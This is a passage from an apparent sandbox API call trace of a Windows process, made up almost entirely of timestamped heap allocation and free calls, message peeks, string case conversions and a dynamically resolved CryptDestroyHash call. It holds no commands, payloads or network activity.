hHeap=0x25c0000) returned 1 [0164.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.648] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.648] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.648] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.648] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.648] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.650] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.651] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0164.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.657] HeapFree (in: hHeap=0x25c0000, 